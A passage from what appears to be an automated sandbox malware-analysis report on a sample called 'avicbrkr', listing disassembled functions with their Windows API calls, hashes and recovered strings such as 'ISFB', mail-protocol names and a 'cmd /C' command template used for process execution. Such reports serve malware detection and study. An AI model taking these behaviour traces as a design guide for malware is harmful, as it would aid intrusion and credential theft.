                      • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 00371881
                      • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 003718A0
                      • SuspendThread.KERNEL32(00000000), ref: 003718AE
                      • CreateEventA.KERNEL32(0039D2D8,00000001,00000000), ref: 003718C2
                      • SetEvent.KERNEL32(00000000), ref: 003718CF
                      • CloseHandle.KERNEL32(00000000), ref: 003718D6
                      • Sleep.KERNEL32(000001F4), ref: 003718E9
                      • ResumeThread.KERNEL32(00000000), ref: 0037190D
                        • Part of subcall function 00389EF2: RegCloseKey.ADVAPI32(?,00000000), ref: 00389F79
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Close$EventHandleThread$CreateDeleteErrorFileLastOpenResumeSleepSuspend
                      • String ID:
                      • API String ID: 3029877175-0
                      • Opcode ID: 4c5c9f715fe44c60572f330b0e507d719b7e9a06bcadae7da1a2b828a3163481
                      • Instruction ID: 9307fea1b4e5bd20d128f28515eb79e3e2d94c3412c05e27520e620bd3e60f13
                      • Opcode Fuzzy Hash: 4c5c9f715fe44c60572f330b0e507d719b7e9a06bcadae7da1a2b828a3163481
                      • Instruction Fuzzy Hash: F8411B76910104FFCB23AFA9EC89DAE7FBDEB49704F108457F505A2260D7364950DB51
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00371A0C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122memorythreadstringCOMMON
                      Download Yara Rule
                      APIs
                      • RtlImageNtHeader.NTDLL ref: 00371A4C
                      • GetCurrentThreadId.KERNEL32 ref: 00371A62
                      • GetCurrentThread.KERNEL32 ref: 00371A73
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D0D1
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D122
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,0038DC33,00000800,?,?,00000000), ref: 0038D192
                        • Part of subcall function 0038CF9B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
                        • Part of subcall function 0038CF9B: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038D1D4
                        • Part of subcall function 0038CF9B: CloseHandle.KERNEL32(00000000), ref: 0038D1E3
                        • Part of subcall function 0038CF9B: memset.NTDLL ref: 0038D1F7
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                        • Part of subcall function 0037196A: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 003719D5
                        • Part of subcall function 0037196A: HeapFree.KERNEL32(00000000,00000000), ref: 003719FD
                      • HeapFree.KERNEL32(00000000,?,00000000), ref: 00371AE7
                      • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 00371AF7
                      • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 00371B43
                      • wsprintfA.USER32 ref: 00371B54
                      • lstrlen.KERNEL32(00000000,00000000), ref: 00371B5F
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                      • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00371B79
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Freememcpy$CurrentThreadlstrlen$AllocateErrorFileTime$CallCloseHandleHeaderImageLastNameNamedPipeSectionStatusSystemTempUnmapViewlstrcpymemsetwsprintf
                      • String ID: W
                      • API String ID: 2926878643-655174618
                      • Opcode ID: 550075644c30437890b8fe01ec3922b0f2ec74d3273d799fb16b26c03a585c5d
                      • Instruction ID: 75436c3f2ed87080e6dfbd7900745c08bf8a6d39e38e8ca49b652d5a66f55897
                      • Opcode Fuzzy Hash: 550075644c30437890b8fe01ec3922b0f2ec74d3273d799fb16b26c03a585c5d
                      • Instruction Fuzzy Hash: 3E418E32900204EFCB33AFA8DC45DAE7BB9FF45740F10851AF44996260E7799955CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037B86E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 117memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(00000000), ref: 0037B8E1
                      • RtlAllocateHeap.NTDLL(00000000,0039CCCA), ref: 0037B8F7
                      • memcpy.NTDLL(00000000,00000000,0039CCC8), ref: 0037B90A
                      • _wcsupr.NTDLL ref: 0037B916
                      • lstrlenW.KERNEL32(?,0039CCC8), ref: 0037B948
                      • RtlAllocateHeap.NTDLL(00000000,?,0039CCC8), ref: 0037B95D
                      • lstrcpyW.KERNEL32(00000000,?), ref: 0037B973
                      • lstrcatW.KERNEL32(00000000,0039E910), ref: 0037B992
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037B9A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Allocatelstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                      • String ID: R9
                      • API String ID: 632491215-134138977
                      • Opcode ID: c13db48be299f273df259752f53daf2ae0892619e2335b26b9c69a375c40df70
                      • Instruction ID: 4fdb1b9c32e6f617e4c690ba2bc037fb07b71eac824b6c6351de7e99859bc173
                      • Opcode Fuzzy Hash: c13db48be299f273df259752f53daf2ae0892619e2335b26b9c69a375c40df70
                      • Instruction Fuzzy Hash: ED31B332514204ABC6336F74AC88B2BBABCEF8A711F16451AF659D3291DB7A9C018751
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00632D8C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108stringCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00632DAA
                      • CoInitializeEx.OLE32(00000000,00000002), ref: 00632DB5
                      • PathFindExtensionW.SHLWAPI(00000000), ref: 00632DD0
                      • lstrcpyW.KERNEL32(00000000,00638224), ref: 00632DE5
                      • lstrlen.KERNEL32(00637614,?,?,?,?,?,?,?,?,?,?,00631853,?), ref: 00632E02
                      • lstrcpyW.KERNEL32(00000000,006384B8), ref: 00632E33
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • wsprintfW.USER32 ref: 00632E6A
                      • ShellExecuteExW.SHELL32(0000003C), ref: 00632E9F
                      • CoUninitialize.OLE32 ref: 00632EB3
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heaplstrcpy$AllocateExecuteExtensionFindFreeInitializePathShellUninitializelstrlenmemsetwsprintf
                      • String ID: <
                      • API String ID: 3500879692-4251816714
                      • Opcode ID: 773376d0db0983aa7065ecf1a2a17dc0e7bf2de445a317b159542f31452fd7b1
                      • Instruction ID: f766e71c42e016c8e4ed94055aa5fcc7469c1c92cc71f4454d1b9e3f67e3d49f
                      • Opcode Fuzzy Hash: 773376d0db0983aa7065ecf1a2a17dc0e7bf2de445a317b159542f31452fd7b1
                      • Instruction Fuzzy Hash: 7E3161B2D00225BBCB51ABA5DC49DDFBAAEEF45750F059115FA01A7212DB74CE00CBE4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00374F23, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 95filememorystringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00377501: memset.NTDLL ref: 00377523
                        • Part of subcall function 00377501: lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 00377567
                        • Part of subcall function 00377501: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 003775AD
                        • Part of subcall function 00377501: CloseHandle.KERNEL32(?), ref: 003775D0
                      • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 00374F6B
                      • CloseHandle.KERNEL32(?), ref: 00374F77
                      • lstrlenW.KERNEL32(00000000), ref: 00374F90
                      • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00374FA1
                      • wcstombs.NTDLL ref: 00374FB0
                      • lstrlen.KERNEL32(?), ref: 00374FBD
                        • Part of subcall function 003895E5: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,00374FCF), ref: 003895F5
                        • Part of subcall function 0038F08B: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038F1E9
                        • Part of subcall function 0038F08B: StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038F222
                        • Part of subcall function 0038F08B: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038F285
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F30A
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,?,0039D478), ref: 0038F355
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,00000000,0039F27A), ref: 0038F368
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F377
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,?), ref: 0038F38D
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,00000000), ref: 0038F39C
                      • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000000,00000001), ref: 00374FF2
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00375005
                      • DeleteFileW.KERNEL32(?), ref: 00375012
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Filelstrlen$CloseCriticalHandleLeaveSectionView$AllocateDeleteMappingOpenTrimUnmapmemsetwcstombs
                      • String ID: R9
                      • API String ID: 2164891022-134138977
                      • Opcode ID: 224f82273cc2d7f69fc0291e455ac241b668716dcfb636be7fde591fffcd7b9c
                      • Instruction ID: c262e63a58cce88a876c4c293e540d1546b8143adeb7b46bac919432e0f1f110
                      • Opcode Fuzzy Hash: 224f82273cc2d7f69fc0291e455ac241b668716dcfb636be7fde591fffcd7b9c
                      • Instruction Fuzzy Hash: 8B315A35910209BFCB23AFA5EC49E9F7B7DEF45350F004066F905A22A0DB768E11DBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038B64A, Relevance: 16.7, APIs: 11, Instructions: 187synchronizationstringCOMMON
                      Download Yara Rule
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0038B67D
                      • memcpy.NTDLL(?,?,00000010), ref: 0038B6A0
                      • memset.NTDLL ref: 0038B6EC
                      • lstrcpyn.KERNEL32(?,?,00000034), ref: 0038B700
                      • GetLastError.KERNEL32 ref: 0038B72E
                      • GetLastError.KERNEL32 ref: 0038B771
                        • Part of subcall function 0038B129: InterlockedExchange.KERNEL32(003713EB,000000FF), ref: 0038B130
                      • GetLastError.KERNEL32 ref: 0038B790
                      • WaitForSingleObject.KERNEL32(?,000927C0), ref: 0038B7CA
                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 0038B7D8
                        • Part of subcall function 0038B51F: memset.NTDLL ref: 0038B567
                        • Part of subcall function 0038B51F: QueueUserWorkItem.KERNEL32(0038B193,?,00000010), ref: 0038B608
                        • Part of subcall function 0038B51F: GetLastError.KERNEL32 ref: 0038B612
                      • GetLastError.KERNEL32 ref: 0038B84D
                      • ReleaseMutex.KERNEL32(?), ref: 0038B85F
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$ObjectSingleWait$memset$ExchangeInterlockedItemMutexQueueReleaseUserWorklstrcpynmemcpy
                      • String ID:
                      • API String ID: 2183084010-0
                      • Opcode ID: aed2db9a5589cab71c032c54efb676566b732152b47afddf5246612e755844cd
                      • Instruction ID: eecfdf4d8d6b4a18fb02cc81a96cfac51b430dcddce6d554ca3dbd4ea5b69b93
                      • Opcode Fuzzy Hash: aed2db9a5589cab71c032c54efb676566b732152b47afddf5246612e755844cd
                      • Instruction Fuzzy Hash: C5616E71914302AFD722AF359C49A1BF7ECBF84721F01896EF596C6690D771E8048F52
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00390939, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 173stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcpyW.KERNEL32(00000000,0039F570), ref: 00390A29
                      • lstrcatW.KERNEL32(00000000,00000000), ref: 00390A31
                      • memcpy.NTDLL(00000000,?,00000008,00000006), ref: 00390ACF
                      • LocalFree.KERNEL32(?,00000006), ref: 00390AE8
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                        • Part of subcall function 00389574: lstrlenW.KERNEL32(00000000,00000000,[9), ref: 00389584
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeap$AllocateLocallstrcatlstrcpylstrlenmemcpy
                      • String ID: IMAP$P$POP3$SMTP$[9
                      • API String ID: 2312297199-107704286
                      • Opcode ID: 570b29d322f12222777384634be917ea122517318a582e7d5afe1ac0af234675
                      • Instruction ID: c35ae2d7863a8aaba2d2f0c5928d0f500d6a8e804c1b3dc1bd69622a9dc3390d
                      • Opcode Fuzzy Hash: 570b29d322f12222777384634be917ea122517318a582e7d5afe1ac0af234675
                      • Instruction Fuzzy Hash: 82517C7290030AAFCF27AFA8CC899AFBBB9EF48300F154426F511F6151DB758951CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00371000, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 156memoryfilestringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcpy.KERNEL32(00000000,?), ref: 00371046
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00371115
                      • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00371145
                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0037115E
                      • CloseHandle.KERNEL32(00000000), ref: 00371168
                      • HeapFree.KERNEL32(00000000,?), ref: 00371178
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00371193
                      • HeapFree.KERNEL32(00000000,?), ref: 003711A3
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$File$AllocateCloseCreateHandleWritelstrcpy
                      • String ID: ISFB
                      • API String ID: 1002670662-2538836093
                      • Opcode ID: 63de142562554913c326692e08b602f9a243245851afe457819efc07a03ab890
                      • Instruction ID: d54657128a45c8f2471aabb0f9ee9471c592d1c4619393b7e6174fbc3c2926c1
                      • Opcode Fuzzy Hash: 63de142562554913c326692e08b602f9a243245851afe457819efc07a03ab890
                      • Instruction Fuzzy Hash: 09516076800118BFDB13AFA4DC84CAE7BBDEF08354F118466FA05A7260D6368E459FA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003776C1, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 102processstringCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 003776D9
                        • Part of subcall function 00386EB8: lstrlen.KERNEL32(?,?,00000000,?,00000000,003777E2,?,?,?,?,?,?,?,?,?,00371255), ref: 00386EC7
                      • lstrlenW.KERNEL32(00000000,00000000,00000000,0039CD50,00000000,cmd /C "%s> %s1"), ref: 00377712
                      • wcstombs.NTDLL ref: 0037771C
                      • CreateProcessA.KERNEL32(00000000,00377AD2,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 00377750
                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00377771
                      • GetExitCodeProcess.KERNEL32(?,?), ref: 0037778E
                      • GetLastError.KERNEL32 ref: 003777A6
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Processlstrlen$CodeCreateErrorExitFreeHeapLastMultipleObjectsWaitmemsetwcstombs
                      • String ID: D$cmd /C "%s> %s1"
                      • API String ID: 3593641235-2226621151
                      • Opcode ID: 7099b8c17bd13537b713856f48224bace0bc0b58c244b39de51f6c1c6155f6af
                      • Instruction ID: a4e29ecbb16ca1ac81311b5f677c1bdf7797527f77ca950da023e8335df002ab
                      • Opcode Fuzzy Hash: 7099b8c17bd13537b713856f48224bace0bc0b58c244b39de51f6c1c6155f6af
                      • Instruction Fuzzy Hash: B9313872D05268AFCB22AFA5CC859FFBFBCEB09750F108026F505B6250D7354A41CBA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038EDFA, Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetTickCount.KERNEL32(?,00000000,?,?), ref: 0038EE36
                        • Part of subcall function 0038E971: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E98D
                        • Part of subcall function 0038E971: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E9AB
                      • GetTickCount.KERNEL32 ref: 0038EF1E
                      • RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038EF32
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038EF50
                        • Part of subcall function 0038EC4C: strcpy.NTDLL ref: 0038EC8A
                        • Part of subcall function 0038EC4C: lstrcat.KERNEL32(00000000,?), ref: 0038EC95
                        • Part of subcall function 0038EC4C: StrTrimA.SHLWAPI(00000000,003994B4), ref: 0038ECB2
                      • StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038EF86
                        • Part of subcall function 00389722: lstrcpy.KERNEL32(00000000,?), ref: 0038974D
                        • Part of subcall function 00389722: lstrcat.KERNEL32(00000000,?), ref: 00389758
                        • Part of subcall function 0038E8FE: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E90B
                        • Part of subcall function 0038E8FE: Sleep.KERNEL32(0000000A,?,00397044,0038E984,0039D480,00000000,00397050,0038F19B), ref: 0038E915
                        • Part of subcall function 0038E8FE: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E964
                      • HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F03B
                      • HeapFree.KERNEL32(00000000,?,0039F27A), ref: 0038F04D
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F05B
                      • HeapFree.KERNEL32(00000000,?), ref: 0038F06B
                      • HeapFree.KERNEL32(00000000,?), ref: 0038F07B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$FreeHeap$EnterLeave$CountTickTrimlstrcat$Sleeplstrcpystrcpy
                      • String ID:
                      • API String ID: 3039249099-0
                      • Opcode ID: 0b3783c9d4764c75c5fece900aaad226e962820b4172d63bbbc74b14a9529959
                      • Instruction ID: 4e0d71901a89a726d7ccc96798f3c4fe18cdf78e1a74d6829c8f6c62057505e5
                      • Opcode Fuzzy Hash: 0b3783c9d4764c75c5fece900aaad226e962820b4172d63bbbc74b14a9529959
                      • Instruction Fuzzy Hash: B77149B2600204FFDB13AFA9EC46E5A3BADFB48310F154462F914D62A1DB36E950DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003738C5, Relevance: 15.2, APIs: 10, Instructions: 175memorystringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00373E0D: RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                        • Part of subcall function 00373E0D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                        • Part of subcall function 00373E0D: HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                        • Part of subcall function 00373E0D: RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      • HeapFree.KERNEL32(00000000,?,0039E1D3), ref: 00373907
                      • RtlAllocateHeap.NTDLL(00000000,00010000,0039E1D3), ref: 00373925
                      • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 00373954
                        • Part of subcall function 0038EDFA: GetTickCount.KERNEL32(?,00000000,?,?), ref: 0038EE36
                        • Part of subcall function 0038EDFA: GetTickCount.KERNEL32 ref: 0038EF1E
                        • Part of subcall function 0038EDFA: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038EF32
                        • Part of subcall function 0038EDFA: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038EF50
                        • Part of subcall function 0038EDFA: StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038EF86
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F03B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?,0039F27A), ref: 0038F04D
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F05B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?), ref: 0038F06B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?), ref: 0038F07B
                      • HeapFree.KERNEL32(00000000,00000000,0000011B), ref: 003739BE
                        • Part of subcall function 0038EDBB: memcpy.NTDLL(0037D7B1,0037D7B1,00000000,0037D7B1,0037D7B1,0037D7B1,00000000,?,?,00374EE9,00000000,00000001,00000000,0039E1C6,0037D7B1,00000000), ref: 0038EDDE
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00373B3E
                        • Part of subcall function 00389B83: memset.NTDLL ref: 00389BB1
                        • Part of subcall function 00389B83: StrTrimA.SHLWAPI(?,003973F4), ref: 00389C12
                        • Part of subcall function 00389B83: StrTrimA.SHLWAPI(00000001,003973F4), ref: 00389C31
                        • Part of subcall function 00389B83: _strupr.NTDLL ref: 00389C38
                        • Part of subcall function 00389B83: StrTrimA.SHLWAPI(?,?), ref: 00389C45
                        • Part of subcall function 00389B83: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00389C8D
                        • Part of subcall function 00389B83: lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?), ref: 00389CAC
                      • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00373B2E
                        • Part of subcall function 00373EAC: RegCloseKey.ADVAPI32(00000057,?,?,003728FD,0039E1CF,00000000,00000000,00000000,~FvR9,00000000,00397048,?,?,?,00374C4E,00000000), ref: 00373EF7
                      • RtlAllocateHeap.NTDLL(00000000,00000400,0039E1D3), ref: 00373A83
                      • wsprintfA.USER32 ref: 00373A97
                      • lstrlen.KERNEL32(00000000,00000000), ref: 00373AA2
                      • lstrlen.KERNEL32(00000000,00000000), ref: 00373B14
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                        • Part of subcall function 0037C12C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0039D244,?,?,00373DFB,0000012B,0039D244,?,?,?,00373E29,00000000,00000000), ref: 0037C16C
                        • Part of subcall function 0037C12C: CloseHandle.KERNEL32(000000FF), ref: 0037C177
                      • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00373ABC
                      • HeapFree.KERNEL32(00000000,?,0039E1D3), ref: 00373ADE
                      • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00373AF9
                      • wsprintfA.USER32 ref: 00373B09
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocate$Trimlstrlenmemcpy$Close$CountCriticalErrorLastSectionTickwsprintf$CallEnterHandleLeaveNamedPipeQueryValue_struprmemset
                      • String ID:
                      • API String ID: 100172519-0
                      • Opcode ID: 34fd7178909c5aad6f807945eb7a4de8b41c6cb5b83b9f5bdbf3e240e5901e89
                      • Instruction ID: b6c0765a409b2c84551c8bcce5c2be3d21f58ade9c2690152ae185c89a8e61c6
                      • Opcode Fuzzy Hash: 34fd7178909c5aad6f807945eb7a4de8b41c6cb5b83b9f5bdbf3e240e5901e89
                      • Instruction Fuzzy Hash: 3C517A72900219BFDF22EF94CC85DAEBB7DEB09340F11446AF605A2250D7795E81EBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003720AD, Relevance: 15.2, APIs: 10, Instructions: 171memorystringthreadCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00373D02: HeapFree.KERNEL32(00000000,?,?), ref: 00373D85
                      • lstrlen.KERNEL32(?,?,?,00000001), ref: 00372173
                      • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00372195
                      • lstrcpy.KERNEL32(00000020,?), ref: 003721B4
                      • lstrlen.KERNEL32(?), ref: 003721BE
                      • memcpy.NTDLL(?,?,?), ref: 003721FF
                      • memcpy.NTDLL(?,?,?), ref: 00372212
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00372255
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                      • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 00372236
                        • Part of subcall function 00372C81: memset.NTDLL ref: 00372CE9
                        • Part of subcall function 00372C81: CloseHandle.KERNEL32(?), ref: 00372D32
                        • Part of subcall function 00372C81: HeapFree.KERNEL32(00000000,?,?), ref: 00372EEC
